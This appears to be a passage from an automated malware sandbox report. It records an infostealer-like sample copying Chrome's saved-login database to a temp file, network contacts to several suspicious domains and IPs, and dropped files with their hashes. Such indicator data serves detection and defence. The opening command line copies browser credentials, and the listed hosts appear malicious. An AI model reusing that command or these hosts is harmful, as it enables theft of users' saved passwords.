/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V

C:\Program Files\Mozilla Firefox\Firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 econstramedia.com udp
IN 103.211.216.55:443 econstramedia.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.216.211.103.in-addr.arpa udp
IN 103.211.216.55:443 econstramedia.com tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 www.x6hk8.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.cindcxyshirts.shop udp
US 104.21.93.64:80 www.cindcxyshirts.shop tcp
US 8.8.8.8:53 64.93.21.104.in-addr.arpa udp
US 104.21.93.64:80 www.cindcxyshirts.shop tcp
US 104.21.93.64:80 www.cindcxyshirts.shop tcp
US 8.8.8.8:53 www.limbicmindset.com udp
US 3.33.130.190:80 www.limbicmindset.com tcp
US 8.8.8.8:53 190.130.33.3.in-addr.arpa udp
US 3.33.130.190:80 www.limbicmindset.com tcp
US 3.33.130.190:80 www.limbicmindset.com tcp
US 8.8.8.8:53 www.vnddq.biz udp
HK 20.2.168.177:80 www.vnddq.biz tcp
US 8.8.8.8:53 177.168.2.20.in-addr.arpa udp
HK 20.2.168.177:80 www.vnddq.biz tcp
HK 20.2.168.177:80 www.vnddq.biz tcp
US 8.8.8.8:53 www.clearconceptslearning.com udp
US 34.149.87.45:80 www.clearconceptslearning.com tcp
US 8.8.8.8:53 45.87.149.34.in-addr.arpa udp
US 34.149.87.45:80 www.clearconceptslearning.com tcp
US 34.149.87.45:80 www.clearconceptslearning.com tcp

Files

memory/448-2-0x00007FFAA7FA3000-0x00007FFAA7FA5000-memory.dmp

memory/448-3-0x000001D8C0E00000-0x000001D8C0E22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qknwf5f4.wlw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/448-13-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp

memory/448-14-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp

memory/1984-17-0x000000007522E000-0x000000007522F000-memory.dmp

memory/1984-18-0x00000000024F0000-0x0000000002526000-memory.dmp

memory/1984-19-0x0000000075220000-0x00000000759D0000-memory.dmp

memory/1984-20-0x0000000005140000-0x0000000005768000-memory.dmp

memory/1984-21-0x0000000075220000-0x00000000759D0000-memory.dmp

memory/1984-22-0x0000000004F60000-0x0000000004F82000-memory.dmp

memory/1984-23-0x0000000005000000-0x0000000005066000-memory.dmp

memory/1984-24-0x0000000005070000-0x00000000050D6000-memory.dmp

memory/1984-34-0x00000000057F0000-0x0000000005B44000-memory.dmp

memory/1984-35-0x0000000005EB0000-0x0000000005ECE000-memory.dmp

memory/1984-36-0x0000000005F40000-0x0000000005F8C000-memory.dmp

memory/1984-37-0x00000000077F0000-0x0000000007E6A000-memory.dmp

memory/1984-38-0x00000000063C0000-0x00000000063DA000-memory.dmp

memory/1984-39-0x0000000007210000-0x00000000072A6000-memory.dmp

memory/1984-40-0x0000000007100000-0x0000000007122000-memory.dmp

memory/1984-41-0x0000000008420000-0x00000000089C4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Aerosoldaasen.Com

MD5 0297ce57c232a13444390269f1a9ea8c
SHA1 718c8339e362670e5ba20bec7f3f81d7ef4caed9
SHA256 f67a6e89cac1951035fe6d5a477641bb80bf1f3b4c88f4b125e4bf7a15fea679
SHA512 6e3d4a24d3591973609296b6a0a2cc563556e225b0fda191a556e3e95ff40305f8692c563e10bce3853f99445f26073364338354c582c3688f6d4fa28aa99527

memory/1984-43-0x00000000089D0000-0x000000000A4D0000-memory.dmp

memory/448-44-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp

memory/448-45-0x00007FFAA7FA3000-0x00007FFAA7FA5000-memory.dmp

memory/1984-53-0x0000000075220000-0x00000000759D0000-memory.dmp

memory/2240-52-0x0000000001200000-0x0000000002D00000-memory.dmp

memory/448-56-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp

memory/3244-57-0x00000000004A0000-0x00000000004AE000-memory.dmp

memory/3244-60-0x00000000004A0000-0x00000000004AE000-memory.dmp

memory/2240-58-0x0000000001200000-0x0000000002D00000-memory.dmp

memory/3244-61-0x0000000000170000-0x000000000019F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DB1

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

memory/3428-77-0x0000000008AE0000-0x0000000008C43000-memory.dmp

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logri.ini

MD5 d63a82e5d81e02e399090af26db0b9cb
SHA1 91d0014c8f54743bba141fd60c9d963f869d76c9
SHA256 eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae
SHA512 38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrf.ini

MD5 2f245469795b865bdd1b956c23d7893d
SHA1 6ad80b974d3808f5a20ea1e766c7d2f88b9e5895
SHA256 1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361
SHA512 909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrg.ini

MD5 4aadf49fed30e4c9b3fe4a3dd6445ebe
SHA1 1e332822167c6f351b99615eada2c30a538ff037
SHA256 75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56
SHA512 eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrv.ini

MD5 bbc41c78bae6c71e63cb544a6a284d94
SHA1 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a
SHA256 ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb
SHA512 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logim.jpeg

MD5 5293effc66c000f03ef08f79303f02f3
SHA1 71ab910b8d8e88db066adf2ed7d66cc01c33d1fa
SHA256 1f65c99a30a05ab9c513790e59eaba8c00643629692dd794f74b9f0e2373efe7
SHA512 ff792e81e4fbe29fac826fe92d2ccd15480f43ecb3919d7bb7a33ab155aab75d0e0bcfb72d46ad3fde9d89363d93480a036189e67b45d61585a6de4b0d78915e